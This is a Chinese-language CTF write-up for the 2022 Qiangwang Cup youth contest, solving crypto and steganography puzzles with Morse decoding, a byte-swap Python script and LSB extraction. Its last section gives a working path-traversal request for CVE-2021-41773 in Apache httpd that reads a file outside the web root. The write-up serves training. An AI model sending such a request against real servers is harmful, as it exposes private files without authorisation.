强网杯青少年专项赛 2022 Writeup

3 min read

这次失了大策,web拉胯了

Crypto

crypto1

没有规则的乱文,该怎么进行分析呢?

下载一堆AB 字符串,试了一下培根不行,然后试了一下摩斯电码,得到一堆英文

image-20220911160447948

我们直接 quipqiup 跑一下得到 flag

image-20220911160631121

Misc

misc1

你知道万能和弦是什么吗?

下载附件里面是一个 png 图片,但是打开提示文件损坏,使用记事本打开发现是base64格式的图片。

image-20220911154039792

使用 CyberChef 解码了一下发现16进制数据顺序颠倒了,正常数据头应该为 89 50 4e 47,也就是奇数位和偶数位互换了

image-20220911154338758

撸个脚本转换一下

import base64
import binascii

listData = []
newData = ''

with open('chuyinweilai.png', 'rb') as f:
    data = str(binascii.hexlify(base64.b64decode(f.read())), encoding='utf-8')
    for i in range(0, len(data), 2):
        listData.append(data[i:i+2])
    for j in range(0, len(listData), 2):
        newData += str(listData[j+1] + listData[j])

with open('flag.png', 'wb') as f:
    f.write(binascii.unhexlify(newData))

得到图片

image-20220911160102407

直接 lsb 解密即可,密码根据题目描述百度搜索万能和旋得到 4536251

python2 lsb.py extract flag.png flag.txt 4536251

misc3

隐写术是一门关于信息隐藏的技巧与科学,隐写的信息看起来像一些其他的东西,隐写不同于加密,加密是一段你看不懂的东西,隐写是一段你似乎能看懂的东西。现在,这里用了一种最简单的隐写方式隐藏了一些信息,你能找到它么?

下载附件,在数据尾发现一个密码 7his_1s_p4s5w0rd ,解压文件得到 FindHideMsg.png

image-20220911153817949

分离 FindHideMsg.png 文件后得到新图 secret.png 同时多出来一部分(我圈出来的地方)

image-20220911153524761

既然是 lsb 隐写,我们直接用脚本解密

python2 lsb.py extract secret.png flag.txt 7his_1s_p4s5w0rd

Web

Web1

存在CVE-2021-41773,你能得到flag吗?

没啥好说的,签到题

/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/flag